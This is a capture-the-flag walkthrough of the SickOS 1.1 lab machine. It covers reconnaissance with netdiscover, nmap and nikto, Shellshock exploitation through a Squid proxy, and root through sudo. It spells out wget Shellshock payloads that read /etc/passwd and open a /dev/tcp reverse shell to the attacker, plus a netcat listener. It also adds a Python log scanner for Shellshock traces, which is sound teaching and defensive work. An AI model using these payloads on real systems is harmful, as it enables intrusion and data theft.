sickos:1.1

From Vulhub

Tools:

  • netdiscover
  • Nmap
  • Metasploit
  • FoxyProxy

Use netdiscover to find the target's IP address:

netdiscover -i eth0 -r 192.168.79.0/24

192.168.79.178 is the target.

Then run nmap to detect the open ports and running services on the target machine.

nmap -sV -v -O -A -T5 192.168.79.178 -p-

Looks like port 22 and port 3128 are open. Port 3128 is running Squid. Open msfconsole and search for squid. I found that:

Then use this module to scan the squid service:

Looks like port 80 is open:

Use the FoxyProxy add-on to configure the proxy:

Now visit http://192.168.79.178

Now let's use nikto to scan the server:

nikto -h localhost -useproxy http://192.168.79.178:3128

Looks like there is a Shellshock vulnerability.

Let's test it:

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"

It works, and it looks like there is an account named sickos.

Now let's set up a reverse shell.

Netcat-style shell access without netcat:

/bin/bash -i > /dev/tcp/[yourip]/[port] 0<&1

In one terminal:

nc -nlvp 4444

In another terminal:

wget -q -O- -U "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/bash -i > /dev/tcp/192.168.79.173/4444 0<&1" -e use_proxy=on -e http_proxy=192.168.79.178:3128 "http://192.168.79.178/cgi-bin/status"
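
Seen from the defending side, the two wget requests above leave the same trace in the web server's access log: a User-Agent value that starts with a bash function definition. The following is an added example, not part of the original write-up, that scans access log lines for that trace and pulls out any /dev/tcp callback address. The combined log format, the sample log lines and the scan function name are assumptions made for illustration.

```python
import re

# Apache "combined" format: ip ident user [time] "request" status size "referer" "agent"
# (assumed here; quotes inside a logged header appear escaped as \")
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED = re.compile(
    r'(\S+) \S+ \S+ \[[^\]]+\] ' + QUOTED + r' \d{3} \S+ ' + QUOTED + ' ' + QUOTED)
# Shellshock trigger: a header value that begins with a bash function definition
FUNC_DEF = re.compile(r'^\s*\(\)\s*\{')
# bash /dev/tcp/<host>/<port> redirection, the callback used in the second request
DEV_TCP = re.compile(r'/dev/tcp/([\w.\-]+)/(\d{1,5})')

# Constructed sample lines, not taken from the target. The client column is
# whatever address the web server saw; behind a proxy that is the proxy.
SAMPLE = [
    r'192.168.79.178 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd"',
    r'192.168.79.178 - - [01/Jan/2024:10:02:00 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { test;};echo \"content-type: text/plain\"; echo; echo; /bin/bash -i > /dev/tcp/192.168.79.173/4444 0<&1"',
    r'192.168.79.178 - - [01/Jan/2024:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

def scan(lines):
    """Return one finding per header that carries a function-definition prefix."""
    findings = []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        client, request, referer, agent = m.groups()
        parts = request.split()
        path = parts[1] if len(parts) > 1 else ""
        for name, value in (("referer", referer), ("user-agent", agent)):
            if FUNC_DEF.search(value):
                cb = DEV_TCP.search(value)
                findings.append({
                    "client": client, "path": path, "header": name,
                    "cgi": path.startswith("/cgi-bin/"),
                    "callback": (cb.group(1), int(cb.group(2))) if cb else None,
                })
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A finding with a non-empty callback field gives the address and port to look for in outbound connection logs.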

Get the shell:

After enumeration, I found an interesting file: /var/www/wolfcms/config.php

Looks like the password is john@123

SSH to the target server as sickos and use this password:

Check sickos's privileges:

sudo -l

Looks like it can run as root

YES